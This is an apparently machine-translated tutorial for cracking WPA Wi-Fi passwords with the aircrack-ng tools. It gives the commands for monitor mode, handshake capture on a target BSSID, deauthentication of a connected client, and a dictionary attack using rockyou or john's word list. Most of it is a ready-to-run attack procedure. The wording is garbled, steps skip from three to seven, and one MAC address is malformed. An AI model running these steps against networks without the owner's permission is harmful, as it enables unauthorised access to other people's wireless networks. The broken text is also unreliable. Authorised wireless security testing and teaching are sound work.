The first step: enter the Monitor mode
airmon-ng # to view the current use of wireless LAN
airmon-ng check # View may affect wireless scanning process
airmon-ng check kill # closed may affect wireless scanning process
airmon-ng start wlan0 # use wlan0 enter Monitor mode
Use iwconfig command to check whether the item wlanmon the Mode switch to Monitor mode
Step Two: Start packet capture and save
airodump-ng wlan0mon -c 1 --bssid 00: 11: 22: 33: 44: 55 -w wpa # - bssid listening device designated MAC is designated channel -c -w monitor packet writing the file
The third step: Deauthentication fetch file XOR (wireless router device has been connected)
Send cancellation packet interrupt device (cell phone, laptop, etc.) is now connected with AP (router), allowing the device to reconnect again
aireplay-ng -0 1 -a EC: 26: CADC: 29: B6 -c 68: 3E: 34: 30: 0F: AA wlan0mon # -0 interrupt instruction 1 -a attempt to cut off the router mac -c wireless LAN MAC address apart from the wireless device using wlan0mon
Description appear handshake handshake successfully obtained information:
Step 7: Use a password dictionary attack (available kali comes, can also be downloaded from the Internet or their own combination of dictionary generation)
aircrack-ng -w /usr/share/john/password.lst wpa-01.cap # -w use dictionary
/ Usr / share / wordlist which has a relatively large dictionaries (over ten million passwords): rockyou.txt.gz, can be unpacked with
Finally come Password: